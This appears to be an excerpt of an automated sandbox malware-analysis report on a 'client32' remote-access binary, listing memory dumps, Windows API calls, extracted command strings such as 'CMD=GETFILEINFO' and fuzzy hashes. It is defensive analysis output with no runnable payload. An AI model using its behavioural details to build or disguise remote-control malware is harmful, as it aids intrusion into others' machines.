                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3660427363-0
                                                                                                                        • Opcode ID: a232fc1abe2ed2d7d844c38d6296ee0920c29362aec6298465a62cb418f01d82
                                                                                                                        • Instruction ID: 10a2649455158eed3fdc33ccecd10e2613defaba2ffe2c5b463718ad866645ae
                                                                                                                        • Opcode Fuzzy Hash: a232fc1abe2ed2d7d844c38d6296ee0920c29362aec6298465a62cb418f01d82
                                                                                                                        • Instruction Fuzzy Hash: 4211ECB67242475FEB11CD24D690B9EF756EFC5339F20812EE58587518D2319882CB53
                                                                                                                        APIs
                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,1117CF74), ref: 110F876D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InformationToken
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4114910276-0
                                                                                                                        • Opcode ID: 3ed54ede1b3f10cca51033c0e31936367da5c7eb08a16c35f026113f9e1de554
                                                                                                                        • Instruction ID: 4286fe34f75cea7b88237b7f19c57be592dd9146774f55c5736f82da2c6cd1b6
                                                                                                                        • Opcode Fuzzy Hash: 3ed54ede1b3f10cca51033c0e31936367da5c7eb08a16c35f026113f9e1de554
                                                                                                                        • Instruction Fuzzy Hash: 9A118A71E0022D9BDB51CBA8DC557EEB7E8AB49304F0040E9E909D7340DB70AE448B91
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,685B6F16,00000000,?,685BD40B,00000001,685B6F16,00000000,00000000,00000000,?,685B6F16,00000001,00000214), ref: 685BA0C5
                                                                                                                          • Part of subcall function 685B60F9: __getptd_noexit.LIBCMT ref: 685B60F9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap__getptd_noexit
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 328603210-0
                                                                                                                        • Opcode ID: a86f339c534cd9872d35ca9763ea1ed858abae99b83c821955b34f32ff375265
                                                                                                                        • Instruction ID: 532255076f6bd0dac442deb89763c6b1f4246476fdcb51f1bb3143e61b06de08
                                                                                                                        • Opcode Fuzzy Hash: a86f339c534cd9872d35ca9763ea1ed858abae99b83c821955b34f32ff375265
                                                                                                                        • Instruction Fuzzy Hash: 0501D43130721ADFFB268E65CC74B5B3794EBA13A4F81452AED35EB180DB75D800C640
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,110B7069,00000000,?,111665A4,?,110B7069,00000000,00000000,00000000,?,11167F37,00000001,00000214,?,110B7069), ref: 1116C979
                                                                                                                          • Part of subcall function 11165ABF: __getptd_noexit.LIBCMT ref: 11165ABF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap__getptd_noexit
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 328603210-0
                                                                                                                        • Opcode ID: 2c2584ae5d3c2f1a4e30704cb69b8cb8ac2400eb86a89467f06266894a6be336
                                                                                                                        • Instruction ID: 4dc312edc878e3fc85dbd7a4fe26ae7c38801a5f560f23fe2cfbf25c3476fc95
                                                                                                                        • Opcode Fuzzy Hash: 2c2584ae5d3c2f1a4e30704cb69b8cb8ac2400eb86a89467f06266894a6be336
                                                                                                                        • Instruction Fuzzy Hash: 8A01D8317012669BFB168F66CD44B6BB79DAF81764F01452AE815CB2D0FBF1D820C780
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __waccess_s
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4272103461-0
                                                                                                                        • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                                        • Instruction ID: 5c2e7bbd61f30f1aea2da67b167f4c2082f9d237e02e17c26463379e16f3f813
                                                                                                                        • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                                        • Instruction Fuzzy Hash: 1FC09B3745814D7F5F055DE5EC00C597F5DD6807747144115F91CC9490DE73E561D540
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __fsopen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3646066109-0
                                                                                                                        • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                                        • Instruction ID: 7f7d982cc39844611e1edaafa4e80019d2d82fc8e8e4ac42b397e22a7b0e0c70
                                                                                                                        • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                                        • Instruction Fuzzy Hash: 0BC09B7644010C77DF111A83DC05E457F1D97C0674F144010FF1C1D1609573E971D685
                                                                                                                        APIs
                                                                                                                        • _NSMClient32@8.PCICL32(?,?,004010A8,00000000), ref: 0040100A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3638445121.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3638427287.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3638462516.0000000000403000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3638481461.0000000000404000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_400000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Client32@8
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 433899448-0
                                                                                                                        • Opcode ID: a50aadacad94cde84f5700121068934964b21678fd47baf16d7368d0ca4f48de
                                                                                                                        • Instruction ID: 101b8ead0f36abaf2e4a9e5d6dc85a2691bea7164fd7fac6f3abc260b8d29af7
                                                                                                                        • Opcode Fuzzy Hash: a50aadacad94cde84f5700121068934964b21678fd47baf16d7368d0ca4f48de
                                                                                                                        • Instruction Fuzzy Hash: 85B012B91043406FC104DB10C880D2B73A8BBC4300F008D0DB4D142181C734D800C632
                                                                                                                        APIs
                                                                                                                        • SetLastError.KERNEL32(00000057), ref: 685A4F6D
                                                                                                                        • EnterCriticalSection.KERNEL32(685DB898), ref: 685A4FE9
                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 685A5002
                                                                                                                        • _free.LIBCMT ref: 685A5086
                                                                                                                        • _free.LIBCMT ref: 685A50BA
                                                                                                                        • GetTickCount.KERNEL32 ref: 685A50CB
                                                                                                                        • GetTickCount.KERNEL32 ref: 685A50E0
                                                                                                                        • Sleep.KERNEL32(00000014,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 685A50F2
                                                                                                                        • EnterCriticalSection.KERNEL32(685DB898,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 685A5108
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 685A5135
                                                                                                                        • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 685A513F
                                                                                                                        • SetLastError.KERNEL32(?), ref: 685A5154
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$ErrorLast$CountEnterLeaveTick_free$Sleep
                                                                                                                        • String ID: CMD=GETFILEINFO$GSK=%s$Gateway_Gsk$LINK=%s
                                                                                                                        • API String ID: 619989478-944126313
                                                                                                                        • Opcode ID: 5885f7d94dc046db7f7346b50a2fae7eb72d44b35c936f7d357ccbbdb73a017f
                                                                                                                        • Instruction ID: c7affead552abfc5e2a6b71322a5ffadac840b49345ac4d2800bd3235128a7fc
                                                                                                                        • Opcode Fuzzy Hash: 5885f7d94dc046db7f7346b50a2fae7eb72d44b35c936f7d357ccbbdb73a017f
                                                                                                                        • Instruction Fuzzy Hash: BA618175904208EFCF10DFE8C884BEEB7B8EF45355F914169E955A7280DB31AE04CBA5
                                                                                                                        APIs
                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00000000,00000000,?), ref: 1112714B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ManagerOpen
                                                                                                                        • String ID: EnumServices returned %d$QueryServiceConfig2W$advapi32.dll
                                                                                                                        • API String ID: 1889721586-3267302290
                                                                                                                        • Opcode ID: 21b3c385728fcf88e82166965005ac8aff01d1b65566217e64c1eab89ee832e7
                                                                                                                        • Instruction ID: 9fb7de677e030cfc0a01f6eedc798a2385bd80f55b8063cdc9a43f6634fa85b6
                                                                                                                        • Opcode Fuzzy Hash: 21b3c385728fcf88e82166965005ac8aff01d1b65566217e64c1eab89ee832e7
                                                                                                                        • Instruction Fuzzy Hash: 39E17575A006599FEB24CF24CD94FABF7B9AF84304F208699E91997240DF30AE85CF50
                                                                                                                        APIs
                                                                                                                        • GetMenu.USER32(?), ref: 11025347
                                                                                                                        • DrawMenuBar.USER32(?), ref: 1102535E
                                                                                                                        • GetMenu.USER32(?), ref: 110253B3
                                                                                                                        • DeleteMenu.USER32(00000000,00000001,00000400), ref: 110253C1
                                                                                                                        • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1102531E
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                        • UpdateWindow.USER32(?), ref: 11025407
                                                                                                                        • IsIconic.USER32(?), ref: 1102541A
                                                                                                                        • SetTimer.USER32(00000000,00000000,000003E8,00000000), ref: 1102543A
                                                                                                                        • KillTimer.USER32(00000000,00000000,00000080,00000002), ref: 110254A0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$TimerWindow$DeleteDrawErrorExitIconicKillLastMessageProcessUpdatewsprintf
                                                                                                                        • String ID: ..\ctl32\chatw.cpp$Chat$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                        • API String ID: 3085788722-363603473
                                                                                                                        • Opcode ID: e69d78fb2f8639c597be4dd6d8a4cfc2e884be2be3f7c90e4c2329286fe3b857
                                                                                                                        • Instruction ID: b6232a099581f0ae497a3b344fdba13ecce31f738ecb0fc666d570829b7bf44f
                                                                                                                        • Opcode Fuzzy Hash: e69d78fb2f8639c597be4dd6d8a4cfc2e884be2be3f7c90e4c2329286fe3b857
                                                                                                                        • Instruction Fuzzy Hash: 14D1AC74B40702ABEB14DB64CC85FAEB3A5BB88708F104558F6529F3C1DAB1F941CB95
                                                                                                                        APIs
                                                                                                                        • _calloc.LIBCMT ref: 1103B306
                                                                                                                        • _free.LIBCMT ref: 1103B400
                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                          • Part of subcall function 110CCAD0: FindResourceExA.KERNEL32(00000000,00000005,?,00000000), ref: 110CCB55
                                                                                                                          • Part of subcall function 110CCAD0: LoadResource.KERNEL32(00000000,00000000), ref: 110CCB84
                                                                                                                          • Part of subcall function 110CCAD0: LockResource.KERNEL32(00000000), ref: 110CCBA8
                                                                                                                          • Part of subcall function 110CCAD0: CreateDialogIndirectParamA.USER32(00000000,00000000,1112A889,110CAE00,00000000), ref: 110CCBD9
                                                                                                                          • Part of subcall function 110CCAD0: CreateDialogIndirectParamA.USER32(00000000,00000000,1112A889,110CAE00,00000000), ref: 110CCBF4
                                                                                                                          • Part of subcall function 110CCAD0: GetLastError.KERNEL32 ref: 110CCC19
                                                                                                                        • _calloc.LIBCMT ref: 1103B415
                                                                                                                        • _free.LIBCMT ref: 1103B450
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
